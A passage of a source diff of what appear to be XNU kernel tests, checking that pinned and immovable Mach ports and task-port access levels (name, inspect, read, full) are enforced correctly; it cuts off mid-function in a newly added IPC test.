+	printf("[Crasher pinned_test_task_self_dealloc] mach_port_deallocate returned %s.\n", mach_error_string(kr));
+}
+
+static void
+pinned_test_task_self_mod_ref()
+{
+       printf("[Crasher]: Mod refs mach_task_self() to 0\n");
+       kern_return_t kr = mach_port_mod_refs(mach_task_self(), mach_task_self(), MACH_PORT_RIGHT_SEND, -2);
+
+	printf("[Crasher pinned_test_task_self_mod_ref] mach_port_mod_refs returned %s.\n", mach_error_string(kr));
+}
+
+static void
+pinned_test_task_threads_mod_ref()
+{
+       printf("[Crasher]: task_threads should return pinned thread ports. Mod refs them to 0\n");
+       thread_array_t th_list;
+       mach_msg_type_number_t th_cnt;
+       kern_return_t kr;
+       mach_port_t th_kp = mach_thread_self();
+       mach_port_deallocate(mach_task_self(), th_kp);
+
+       kr = task_threads(mach_task_self(), &th_list, &th_cnt);
+       mach_port_deallocate(mach_task_self(), th_list[0]);
+
+       kr = mach_port_mod_refs(mach_task_self(), th_list[0], MACH_PORT_RIGHT_SEND, -1);
+
+	printf("[Crasher pinned_test_task_threads_mod_ref] mach_port_mod_refs returned %s.\n", mach_error_string(kr));
+}
+
+static void
+immovable_test_move_send_task_self()
+{
+       kern_return_t kr;
+       printf("[Crasher]: Move send mach_task_self_\n");
+       kr = attempt_send_immovable_port(mach_task_self(), MACH_MSG_TYPE_MOVE_SEND);
+
+	printf("[Crasher immovable_test_move_send_task_self] attempt_send_immovable_port returned %s.\n", mach_error_string(kr));
+}
+
+static void
+immovable_test_copy_send_task_self()
+{
+       kern_return_t kr;
+       printf("[Crasher]: Copy send mach_task_self_\n");
+       kr = attempt_send_immovable_port(mach_task_self(), MACH_MSG_TYPE_COPY_SEND);
+
+	printf("[Crasher immovable_test_copy_send_task_self] attempt_send_immovable_port returned %s.\n", mach_error_string(kr));
+}
+
+static void
+immovable_test_move_send_thread_self()
+{
+       kern_return_t kr;
+       printf("[Crasher]: Move send main thread's self port\n");
+       kr = attempt_send_immovable_port(mach_thread_self(), MACH_MSG_TYPE_MOVE_SEND);
+
+	printf("[Crasher immovable_test_move_send_thread_self] attempt_send_immovable_port returned %s.\n", mach_error_string(kr));
+}
+
+static void
+immovable_test_copy_send_thread_self()
+{
+       kern_return_t kr;
+       mach_port_t port;
+       printf("[Crasher]: Copy send main thread's self port\n");
+       port = mach_thread_self();
+       kr = attempt_send_immovable_port(port, MACH_MSG_TYPE_COPY_SEND);
+	printf("[Crasher immovable_test_copy_send_thread_self] attempt_send_immovable_port returned %s.\n", mach_error_string(kr));
+
+       mach_port_deallocate(mach_task_self(), port);
+}
+
+static void
+immovable_test_copy_send_task_read()
+{
+       kern_return_t kr;
+       mach_port_t port;
+       printf("[Crasher]: Copy send task read port\n");
+       kr = task_get_special_port(mach_task_self(), TASK_READ_PORT, &port);
+       assert(kr == 0);
+       kr = attempt_send_immovable_port(port, MACH_MSG_TYPE_COPY_SEND);
+	printf("[Crasher immovable_test_copy_send_task_read] attempt_send_immovable_port returned %s.\n", mach_error_string(kr));
+
+       mach_port_deallocate(mach_task_self(), port);
+}
+
+static void
+immovable_test_copy_send_task_inspect()
+{
+       kern_return_t kr;
+       mach_port_t port;
+       printf("[Crasher]: Move send task inspect port\n");
+       kr = task_get_special_port(mach_task_self(), TASK_INSPECT_PORT, &port);
+       assert(kr == 0);
+       kr = attempt_send_immovable_port(port, MACH_MSG_TYPE_MOVE_SEND);
+	printf("[Crasher immovable_test_copy_send_task_inspect] attempt_send_immovable_port returned %s.\n", mach_error_string(kr));
+}
+
+static void
+immovable_test_move_send_thread_inspect()
+{
+       kern_return_t kr;
+       mach_port_t port;
+       mach_port_t th_port = mach_thread_self();
+
+       printf("[Crasher]: Move send thread inspect port\n");
+       kr = thread_get_special_port(th_port, THREAD_INSPECT_PORT, &port);
+       assert(kr == 0);
+       kr = attempt_send_immovable_port(port, MACH_MSG_TYPE_MOVE_SEND);
+	printf("[Crasher immovable_test_move_send_thread_inspect] attempt_send_immovable_port returned %s.\n", mach_error_string(kr));
+
+       mach_port_deallocate(mach_task_self(), th_port);
+}
+
+static void
+immovable_test_copy_send_thread_read()
+{
+       kern_return_t kr;
+       mach_port_t port;
+       mach_port_t th_port = mach_thread_self();
+
+       printf("[Crasher]: Copy send thread read port\n");
+       kr = thread_get_special_port(th_port, THREAD_READ_PORT, &port);
+       assert(kr == 0);
+       kr = attempt_send_immovable_port(port, MACH_MSG_TYPE_COPY_SEND);
+	printf("[Crasher immovable_test_copy_send_thread_read] attempt_send_immovable_port returned %s.\n", mach_error_string(kr));
+
+       mach_port_deallocate(mach_task_self(), port);
+       mach_port_deallocate(mach_task_self(), th_port);
+}
+
+int
+main(int argc, char *argv[])
+{
+       void (*tests[MAX_TEST_NUM])(void) = {
+               pinned_test_main_thread_mod_ref,
+               pinned_test_pthread_dealloc,
+               pinned_test_task_self_dealloc,
+               pinned_test_task_self_mod_ref,
+               pinned_test_task_threads_mod_ref,
+
+               immovable_test_move_send_task_self,
+               immovable_test_copy_send_task_self,
+               immovable_test_move_send_thread_self,
+               immovable_test_copy_send_thread_self,
+               immovable_test_copy_send_task_read,
+               immovable_test_copy_send_task_inspect,
+               immovable_test_move_send_thread_inspect,
+               immovable_test_copy_send_thread_read,
+       };
+       printf("[Crasher]: My Pid: %d\n", getpid());
+
+       if (argc < 2) {
+		printf("[Crasher]: Specify a test to run.\n");
+               exit(-1);
+       }
+
+       int test_num = atoi(argv[1]);
+
+       if (test_num >= 0 && test_num < MAX_TEST_NUM) {
+               (*tests[test_num])();
+       } else {
+               printf("[Crasher]: Invalid test num. Exiting...\n");
+               exit(-1);
+       }
+
+       exit(0);
+}
diff --git a/tests/inspect_port.c b/tests/inspect_port.c
deleted file mode 100644 (file)
index b128b5b..0000000
+++ /dev/null
@@ -1,581 +0,0 @@
-#include <stdio.h>
-#include <stdlib.h>
-#include <unistd.h>
-#include <darwintest.h>
-#include <pthread.h>
-#include <signal.h>
-#include <libproc.h>
-#include <mach/mach.h>
-#include <mach/mach_vm.h>
-#include <mach/mach_error.h>
-#include <System/sys/codesign.h>
-#include <sys/proc.h>
-
-int task_for_pid(mach_port_name_t target_tport, int pid, mach_port_name_t *t);
-int task_read_for_pid(mach_port_name_t target_tport, int pid, mach_port_name_t *t);
-int task_inspect_for_pid(mach_port_name_t target_tport, int pid, mach_port_name_t *t);
-int task_name_for_pid(mach_port_name_t target_tport, int pid, mach_port_name_t *t);
-static int test_conversion_eval(pid_t current, pid_t victim, int translation);
-
-static int g_tfpFail  = 0;
-static int g_trfpFail = 0;
-static int g_tifpFail = 0;
-static int g_tnfpFail = 0;
-
-static pthread_mutex_t g_lock;
-
-#define NAME    0
-#define INSPECT 1
-#define READ    2
-#define FULL    3
-#define POLY    4
-
-/*
- *  3. child still spawn as platform binary
- */
-
-/* Mimic the behavior of task_conversion_eval in kernel.
- */
-static int
-test_conversion_eval(pid_t current, pid_t victim, int translation)
-{
-       uint32_t my_csflags = 0;
-       uint32_t victim_csflags = 0;
-       csops(victim, CS_OPS_STATUS, &victim_csflags, sizeof(victim_csflags));
-       csops(current, CS_OPS_STATUS, &my_csflags, sizeof(my_csflags));
-
-       switch (translation) {
-       case FULL:
-       case READ:
-               if (victim == 0) {
-                       return false;
-               }
-               if (!(my_csflags & CS_PLATFORM_BINARY) && (victim_csflags & CS_PLATFORM_BINARY)) {
-                       return false;
-               }
-               break;
-       default:
-               break;
-       }
-
-       return true;
-}
-
-static void
-check_result(kern_return_t kr, int port_type, int translation, int low, char *test_str, pid_t victim)
-{
-       char error[100];
-
-       if (translation == POLY) {
-               if (port_type == FULL) {
-                       translation = INSPECT;
-               } else {
-                       translation = port_type;
-               }
-       }
-
-       if (port_type < low) {
-               goto fail;
-       } else if (port_type < translation) {
-               goto fail;
-       } else if (!test_conversion_eval(getpid(), victim, translation)) {
-               goto fail;
-       } else {
-               goto success;
-       }
-
-fail:
-       snprintf(error, sizeof(error), "%s should fail with %d on %d.\n", test_str, port_type, victim);
-       T_QUIET; T_EXPECT_NE(kr, 0, "check_result: %s", error);
-       return;
-success:
-       snprintf(error, sizeof(error), "%s should succeed with %d on %d.\n", test_str, port_type, victim);
-       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "check_result: %s", error);
-       return;
-}
-
-static void
-test_thread_port(mach_port_name_t thread, int type, pid_t victim)
-{
-       kern_return_t kr;
-       mach_port_t name = MACH_PORT_NULL;
-       thread_info_data_t th_info;
-       mach_msg_type_number_t th_info_cnt = THREAD_INFO_MAX;
-
-       kr = thread_info(thread, THREAD_BASIC_INFO, (thread_info_t)th_info, &th_info_cnt);
-       check_result(kr, type, INSPECT, INSPECT, "thread_info", victim);
-
-       kr = thread_get_special_port(thread, THREAD_KERNEL_PORT, &name);
-       check_result(kr, type, POLY, FULL, "thread_get_special_port: THREAD_KERNEL_PORT", victim);
-       kr = mach_port_deallocate(mach_task_self(), name);
-       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
-
-       kr = thread_get_special_port(thread, THREAD_READ_PORT, &name);
-       check_result(kr, type, POLY, READ, "thread_get_special_port: THREAD_READ_PORT", victim);
-       kr = mach_port_deallocate(mach_task_self(), name);
-       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
-
-       kr = thread_get_special_port(thread, THREAD_INSPECT_PORT, &name);
-       check_result(kr, type, POLY, INSPECT, "thread_get_special_port: THREAD_INSPECT_PORT", victim);
-       kr = mach_port_deallocate(mach_task_self(), name);
-       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
-}
-
-static void
-test_task_port(mach_port_name_t port, int type)
-{
-       kern_return_t kr;
-       volatile int data = 0x4141;
-       volatile int new_value = 0x4242;
-       pid_t victim;
-       if (port == MACH_PORT_NULL) {
-               return;
-       }
-       kr = pid_for_task(port, &victim);
-       if (victim == -1) {
-               T_LOG("pid_for_task: port = 0x%x, type = %u is not valid anymore", port, type);
-               return;
-       }
-       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "pid_for_task, port = 0x%x, type = %u, pid = %u", port, type, victim);
-
-       /************* TASK_INFO ************/
-       struct task_basic_info info = {};
-       mach_msg_type_number_t cnt = sizeof(info);
-       kr = task_info(port, TASK_BASIC_INFO, (task_info_t)&info, &cnt);
-       check_result(kr, type, NAME, NAME, "task_info", victim);
-
-       /************ MACH_VM_* ************/
-
-       if (victim == getpid()) {
-               kr = mach_vm_write(port,
-                   (mach_vm_address_t)&data,
-                   (vm_offset_t)&new_value,
-                   (mach_msg_type_number_t)sizeof(int));
-               check_result(kr, type, FULL, FULL, "mach_vm_write", victim);
-
-               vm_offset_t read_value = 0;
-               mach_msg_type_number_t read_cnt = 0;
-               kr = mach_vm_read(port,
-                   (mach_vm_address_t)&data,
-                   (mach_msg_type_number_t)sizeof(int),
-                   &read_value,
-                   &read_cnt);
-               check_result(kr, type, READ, READ, "mach_vm_read", victim);
-       }
-
-       /************ TASK_GET_SPECIAL_PORT ************/
-
-       mach_port_t name = MACH_PORT_NULL;
-       kr = task_get_special_port(port, TASK_KERNEL_PORT, &name);
-       check_result(kr, type, POLY, FULL, "task_get_special_port: TASK_KERNEL_PORT", victim);
-
-       name = MACH_PORT_NULL;
-       kr = task_get_special_port(port, TASK_READ_PORT, &name);
-       check_result(kr, type, POLY, READ, "task_get_special_port: TASK_READ_PORT", victim);
-       if (kr == KERN_SUCCESS) {
-               kr = mach_port_deallocate(mach_task_self(), name);
-               T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
-       }
-
-       name = MACH_PORT_NULL;
-       kr = task_get_special_port(port, TASK_INSPECT_PORT, &name);
-       check_result(kr, type, POLY, INSPECT, "task_get_special_port: TASK_INSPECT_PORT", victim);
-       if (kr == KERN_SUCCESS) {
-               kr = mach_port_deallocate(mach_task_self(), name);
-               T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
-       }
-
-       name = MACH_PORT_NULL;
-       kr = task_get_special_port(port, TASK_NAME_PORT, &name);
-       check_result(kr, type, POLY, INSPECT, "task_get_special_port: TASK_NAME_PORT", victim);
-       if (kr == KERN_SUCCESS) {
-               kr = mach_port_deallocate(mach_task_self(), name);
-               T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
-       }
-
-       name = MACH_PORT_NULL;
-       kr = task_get_special_port(port, TASK_HOST_PORT, &name);
-       check_result(kr, type, POLY, FULL, "task_get_special_port: TASK_HOST_PORT", victim);
-       if (kr == KERN_SUCCESS) {
-               if (victim == getpid()) {
-                       mach_port_t host = mach_host_self();
-                       T_QUIET; T_EXPECT_EQ(host, name, "mach_host_self == task_get_special_port(.. TASK_HOST_PORT)");
-               }
-       }
-
-       name = MACH_PORT_NULL;
-       kr = task_get_special_port(port, TASK_BOOTSTRAP_PORT, &name);
-       check_result(kr, type, POLY, FULL, "task_get_special_port: TASK_BOOTSTRAP_PORT", victim);
-
-       /************ TEST IPC_SPACE_READ AND IPC_SPACE_INSPECT ************/
-       if (victim == getpid()) {
-               mach_port_status_t status;
-               mach_msg_type_number_t statusCnt = MACH_PORT_LIMITS_INFO_COUNT;
-               kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &name);
-               T_QUIET; T_EXPECT_MACH_SUCCESS(kr, 0, "mach_port_allocate should succeed");
-
-               kr = mach_port_get_attributes(port, name, MACH_PORT_LIMITS_INFO, (mach_port_info_t)&status, &statusCnt);
-               check_result(kr, type, POLY, READ, "mach_port_get_attributes", victim);
-
-               mach_port_context_t context;
-               kr = mach_port_get_context(port, name, &context);
-               check_result(kr, type, POLY, READ, "mach_port_get_context", victim);
-
-               kr = mach_port_destruct(mach_task_self(), name, 0, 0);
-               T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_destruct");
-       }
-
-       ipc_info_space_basic_t sinfo;
-       kr = mach_port_space_basic_info(port, &sinfo);
-       check_result(kr, type, INSPECT, INSPECT, "mach_port_space_basic_info", victim);
-
-       /************ MACH_PORT_ALLOCATE ************/
-
-       mach_port_t new_port = MACH_PORT_NULL;
-       kr = mach_port_allocate(port, MACH_PORT_RIGHT_RECEIVE, &new_port);
-       check_result(kr, type, FULL, FULL, "mach_port_allocate", victim);
-       if (kr == KERN_SUCCESS) {
-               kr = mach_port_destruct(port, new_port, 0, 0);
-               T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_destruct");
-       }
-
-       /************ INSPECT INTERFACES ************/
-       int counts[2];
-       mach_msg_type_number_t size = TASK_INSPECT_BASIC_COUNTS_COUNT;
-       kr = task_inspect(port, TASK_INSPECT_BASIC_COUNTS, counts, &size);
-       check_result(kr, type, INSPECT, INSPECT, "task_inspect", victim);
-
-       /************ TASK_SET_SPECIAL_PORT ************/
-
-       if (type == FULL) {
-               new_port = MACH_PORT_NULL;
-               kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &new_port);
-               T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_allocate");
-               kr = mach_port_insert_right(mach_task_self(), new_port, new_port, MACH_MSG_TYPE_MAKE_SEND);
-               T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_insert_right");
-
-               mach_port_t backup;
-               kr = task_get_special_port(port, TASK_BOOTSTRAP_PORT, &backup);
-               check_result(kr, type, POLY, FULL, "task_get_special_port", victim);
-               kr = task_set_special_port(port, TASK_BOOTSTRAP_PORT, new_port);
-               check_result(kr, type, FULL, FULL, "task_set_special_port", victim);
-               kr = task_set_special_port(port, TASK_BOOTSTRAP_PORT, backup);
-               check_result(kr, type, FULL, FULL, "task_set_special_port", victim);
-
-               kr = mach_port_deallocate(mach_task_self(), new_port);
-               T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
-               mach_port_mod_refs(mach_task_self(), new_port, MACH_PORT_RIGHT_RECEIVE, -1);
-               T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_mod_refs");
-       }
-       /************ TASK_THREADS ************/
-       thread_array_t th_list;
-       mach_msg_type_number_t th_cnt = 0;
-
-       kr = task_threads(port, &th_list, &th_cnt);
-       check_result(kr, type, POLY, INSPECT, "task_threads", victim);
-
-       /* Skip thread ports tests if task_threads() fails */
-       if (kr != KERN_SUCCESS) {
-               return;
-       }
-
-       /************ THREAD_GET_SPECIAL_PORT ************/
-       mach_port_t special = MACH_PORT_NULL;
-
-       switch (type) {
-       case FULL:
-               kr = thread_get_special_port(th_list[0], THREAD_KERNEL_PORT, &special);
-               break;
-       case READ:
-               kr = thread_get_special_port(th_list[0], THREAD_READ_PORT, &special);
-               break;
-       case INSPECT:
-               kr = thread_get_special_port(th_list[0], THREAD_INSPECT_PORT, &special);
-               break;
-       default:
-               break;
-       }
-
-       T_QUIET; T_EXPECT_EQ(special, th_list[0], "thread_get_special_port should match task_threads");
-
-       kr = mach_port_deallocate(mach_task_self(), special);
-       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
-
-       for (unsigned int i = 0; i < th_cnt; i++) {
-               test_thread_port(th_list[i], type, victim); /* polymorphic */
-               kr = mach_port_deallocate(mach_task_self(), th_list[i]);
-               T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
-       }
-}
-
-static void
-test_get_child_port(int with_sleep)
-{
-       pid_t child_pid;
-       kern_return_t kr;
-       mach_port_name_t tr, ti, tp, tn;
-
-       child_pid = fork();
-
-       if (child_pid < 0) {
-               T_FAIL("fork failed in test_get_child_port.");
-       }
-
-       if (child_pid == 0) {
-               while (1) {
-                       sleep(10);
-               }
-       }
-
-       kr = task_for_pid(mach_task_self(), child_pid, &tp);
-       if (with_sleep) {
-               T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "task_for_pid for child %u", child_pid);
-       } else if (kr != 0) {
-               g_tfpFail++;
-       }
-
-       kr = task_read_for_pid(mach_task_self(), child_pid, &tr);
-       if (with_sleep) {
-               T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "task_read_for_pid for child %u", child_pid);
-       } else if (kr != 0) {
-               g_trfpFail++;
-       }
-
-       kr = task_inspect_for_pid(mach_task_self(), child_pid, &ti);
-       if (with_sleep) {
-               T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "task_inspect_for_pid for child %u", child_pid);
-       } else if (kr != 0) {
-               g_tifpFail++;
-       }
-
-       kr = task_name_for_pid(mach_task_self(), child_pid, &tn);
-       if (with_sleep) {
-               T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "task_name_for_pid for child %u", child_pid);
-       } else if (kr != 0) {
-               g_tnfpFail++;
-       }
-
-       kr = mach_port_deallocate(mach_task_self(), tp);
-       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
-       kr = mach_port_deallocate(mach_task_self(), tr);
-       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
-       kr = mach_port_deallocate(mach_task_self(), ti);
-       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
-       kr = mach_port_deallocate(mach_task_self(), tn);
-       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
-
-       kill(child_pid, SIGKILL);
-       int status;
-       wait(&status);
-}
-
-static void
-test_child_exec()
-{
-       pid_t child_pid;
-       kern_return_t kr;
-       mach_port_name_t tr2, ti2, tp2, tn2;
-
-       child_pid = fork();
-
-       if (child_pid < 0) {
-               T_FAIL("fork failed in test_child_exec.");
-       }
-
-       if (child_pid == 0) {
-               execve("/bin/bash", NULL, NULL);
-       }
-
-       sleep(10);
-
-       kr = task_name_for_pid(mach_task_self(), child_pid, &tn2);
-       test_task_port(tn2, NAME);
-
-       kr = task_for_pid(mach_task_self(), child_pid, &tp2);
-       test_task_port(tp2, FULL);
-
-       kr = task_read_for_pid(mach_task_self(), child_pid, &tr2);
-       test_task_port(tr2, READ);
-
-       kr = task_inspect_for_pid(mach_task_self(), child_pid, &ti2);
-       test_task_port(ti2, INSPECT);
-
-       kr = mach_port_deallocate(mach_task_self(), tp2);
-       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
-       kr = mach_port_deallocate(mach_task_self(), tr2);
-       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
-       kr = mach_port_deallocate(mach_task_self(), ti2);
-       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
-       kr = mach_port_deallocate(mach_task_self(), tn2);
-       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
-
-       kill(child_pid, SIGKILL);
-       int status;
-       wait(&status);
-}
-
-static void *
-thread_run()
-{
-       pthread_mutex_lock(&g_lock);
-       pthread_mutex_unlock(&g_lock);
-
-       pthread_exit(NULL);
-
-       return NULL;
-}
-
-#ifdef T_NOCODESIGN
-#define TEST_NAME inspect_read_port_nocodesign
-#else
-#define TEST_NAME inspect_read_port
-#endif
-
-T_DECL(TEST_NAME, "inspect and read port test", T_META_ASROOT(true))
-{
-       kern_return_t kr;
-       pid_t pid = 0;
-       mach_port_t port = MACH_PORT_NULL;
-
-       kr = pid_for_task(mach_task_self(), &pid);
-       T_EXPECT_MACH_SUCCESS(kr, "pid_for_task: My Pid = %d", pid);
-
-#ifdef T_NOCODESIGN
-       T_LOG("Running as non-platform binary...\n");
-#else
-       T_LOG("Running as platform binary...\n");
-#endif
-
-       kr = task_for_pid(mach_task_self(), pid, &port);
-       T_EXPECT_EQ(kr, 0, "task_for_pid(mach_task_self..): %u", port);
-       T_EXPECT_EQ(port, mach_task_self(), "task_for_pid == mach_task_self");
-       test_task_port(port, FULL);
-
-       port = MACH_PORT_NULL;
-       kr = task_read_for_pid(mach_task_self(), pid, &port);
-       T_EXPECT_EQ(kr, 0, "task_read_for_pid(mach_task_self..): read port = %u", port);
-       test_task_port(port, READ);
-       kr = mach_port_deallocate(mach_task_self(), port);
-       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
-
-       port = MACH_PORT_NULL;
-       kr = task_inspect_for_pid(mach_task_self(), pid, &port);
-       T_EXPECT_EQ(kr, 0, "task_inspect_for_pid(mach_task_self..): inspect port = %u", port);
-       test_task_port(port, INSPECT);
-       kr = mach_port_deallocate(mach_task_self(), port);
-       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
-
-       port = MACH_PORT_NULL;
-       kr = task_name_for_pid(mach_task_self(), pid, &port);
-       T_EXPECT_EQ(kr, 0, "task_name_for_pid(mach_task_self..): name port = %u", port);
-       test_task_port(port, NAME);
-       kr = mach_port_deallocate(mach_task_self(), port);
-       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
-
-       port = MACH_PORT_NULL;
-       kr = task_read_for_pid(mach_task_self(), 0, &port);
-       T_EXPECT_NE(kr, 0, "task_read_for_pid for kernel should fail");
-
-       /* task_read_for_pid loop, check for leaks */
-       for (int i = 0; i < 0x1000; i++) {
-               kr = task_read_for_pid(mach_task_self(), pid, &port);
-               test_task_port(port, READ);
-               kr = mach_port_deallocate(mach_task_self(), port);
-               T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
-       }
-
-       /* task_inspect_for_pid loop, check for leaks */
-       for (int i = 0; i < 0x1000; i++) {
-               kr = task_inspect_for_pid(mach_task_self(), pid, &port);
-               test_task_port(port, INSPECT);
-               kr = mach_port_deallocate(mach_task_self(), port);
-               T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
-       }
-
-       /* fork-exec a child process */
-       test_child_exec();
-
-       /* fork, get full/read/inspect/name port for the child then kill it */
-       for (int i = 0; i < 10; i++) {
-               test_get_child_port(TRUE);
-       }
-
-       T_LOG("tfp fail: %d, trfp fail: %d, tifp fail: %d, tnfp fail: %d, TOTAL: 10\n",
-           g_tfpFail, g_trfpFail, g_tifpFail, g_tnfpFail);
-
-
-       /* task thread loop, check for leaks */
-       thread_array_t th_list;
-       mach_msg_type_number_t th_cnt;
-       pthread_t thread;
-
-       pthread_mutex_init(&g_lock, NULL);
-       pthread_mutex_lock(&g_lock);
-
-       for (unsigned i = 0; i < 0x100; i++) {
-               pthread_create(&thread, NULL, thread_run, NULL);
-       }
-
-       for (unsigned i = 0; i < 0x1000; i++) {
-               kr = task_threads(mach_task_self(), &th_list, &th_cnt);
-               T_QUIET; T_ASSERT_EQ(th_cnt, 0x101, "257 threads");
-
-               for (unsigned j = 0; j < th_cnt; j++) {
-                       kr = mach_port_deallocate(mach_task_self(), th_list[j]);
-                       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
-               }
-       }
-       pthread_mutex_unlock(&g_lock);
-
-       /* processor_set_tasks_with_flavor */
-
-       processor_set_name_array_t psets;
-       processor_set_t        pset;
-       task_array_t tasks;
-       mach_msg_type_number_t pcnt, tcnt;
-       mach_port_t host = mach_host_self();
-
-       kr = host_processor_sets(host, &psets, &pcnt);
-       kr = host_processor_set_priv(host, psets[0], &pset);
-
-       kr = processor_set_tasks_with_flavor(pset, TASK_FLAVOR_CONTROL, &tasks, &tcnt);
-       T_EXPECT_EQ(kr, 0, "processor_set_tasks_with_flavor: TASK_FLAVOR_CONTROL should succeed");
-       for (unsigned int i = 0; i < tcnt; i++) {
-               test_task_port(tasks[i], FULL);
-               kr = mach_port_deallocate(mach_task_self(), tasks[i]);
-               T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
-       }
-
-       kr = processor_set_tasks_with_flavor(pset, TASK_FLAVOR_READ, &tasks, &tcnt);
-       T_EXPECT_EQ(kr, 0, "processor_set_tasks_with_flavor: TASK_FLAVOR_READ should succeed");
-       for (unsigned int i = 0; i < tcnt; i++) {
-               test_task_port(tasks[i], READ);
-               kr = mach_port_deallocate(mach_task_self(), tasks[i]);
-               T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
-       }
-
-       kr = processor_set_tasks_with_flavor(pset, TASK_FLAVOR_INSPECT, &tasks, &tcnt);
-       T_EXPECT_EQ(kr, 0, "processor_set_tasks_with_flavor: TASK_FLAVOR_INSPECT should succeed");
-       for (unsigned int i = 0; i < tcnt; i++) {
-               test_task_port(tasks[i], INSPECT);
-               kr = mach_port_deallocate(mach_task_self(), tasks[i]);
-               T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
-       }
-
-       kr = processor_set_tasks_with_flavor(pset, TASK_FLAVOR_NAME, &tasks, &tcnt);
-       T_EXPECT_EQ(kr, 0, "processor_set_tasks_with_flavor: TASK_FLAVOR_NAME should succeed");
-       for (unsigned int i = 0; i < tcnt; i++) {
-               test_task_port(tasks[i], NAME);
-               kr = mach_port_deallocate(mach_task_self(), tasks[i]);
-               T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
-       }
-
-       // Cleanup
-       for (unsigned int i = 0; i < pcnt; i++) {
-               kr = mach_port_deallocate(mach_task_self(), psets[i]);
-               T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
-       }
-
-       kr = mach_port_deallocate(mach_task_self(), pset);
-       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
-}
diff --git a/tests/ipc_mach_port.c b/tests/ipc_mach_port.c
new file mode 100644 (file)
index 0000000..b17dbc0
--- /dev/null
@@ -0,0 +1,190 @@
+#include <darwintest.h>
+#include <darwintest_multiprocess.h>
+#include <launch.h>
+#include <servers/bootstrap.h>
+#include <sys/sysctl.h>
+#include "exc_helpers.h"
+
+T_GLOBAL_META(
+       T_META_NAMESPACE("xnu.ipc"),
+       T_META_RUN_CONCURRENTLY(true));
+
+#pragma mark - helpers
+
+#define SERVICE_NAME  "com.apple.xnu.test.mach_port"
+
+struct one_port_msg {
+       mach_msg_header_t          header;
+       mach_msg_body_t            body;
+       mach_msg_port_descriptor_t port_descriptor;
+       mach_msg_trailer_t         trailer;            // subtract this when sending
+};
+
+static mach_port_t
+server_checkin(void)
+{
+       mach_port_t mp;
+       kern_return_t kr;
+
+       kr = bootstrap_check_in(bootstrap_port, SERVICE_NAME, &mp);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "bootstrap_check_in");
+       return mp;
+}
+
+static mach_port_t
+server_lookup(void)
+{
+       mach_port_t mp;
+       kern_return_t kr;
+
+       kr = bootstrap_look_up(bootstrap_port, SERVICE_NAME, &mp);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "bootstrap_look_up");
+       return mp;
+}
+
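+/*
+ * Build a fresh port for the test: MPO_INSERT_SEND_RIGHT asks
+ * mach_port_construct() to also insert a send right under the same name, so
+ * the caller ends up holding one receive right and one send right.
+ */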
+static mach_port_t
+make_sr_port(void)
+{
+       mach_port_options_t opts = {
+               .flags = MPO_INSERT_SEND_RIGHT,
+       };
+       kern_return_t kr;
+       mach_port_t port;
+
+       kr = mach_port_construct(mach_task_self(), &opts, 0ull, &port);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "mach_port_construct");
+       return port;
+}
+
+static void
+destroy_port(mach_port_t port, bool receive, int srights)
+{
+       kern_return_t kr;
+
+       if (srights) {
+               kr = mach_port_mod_refs(mach_task_self(), port,
+                   MACH_PORT_RIGHT_SEND, -srights);
+               T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "srights -= %d", srights);
+       }
+       if (receive) {
+               kr = mach_port_mod_refs(mach_task_self(), port,
+                   MACH_PORT_RIGHT_RECEIVE, -1);
+               T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "receive -= 1");
+       }
+}
+
+static void
+send_port(
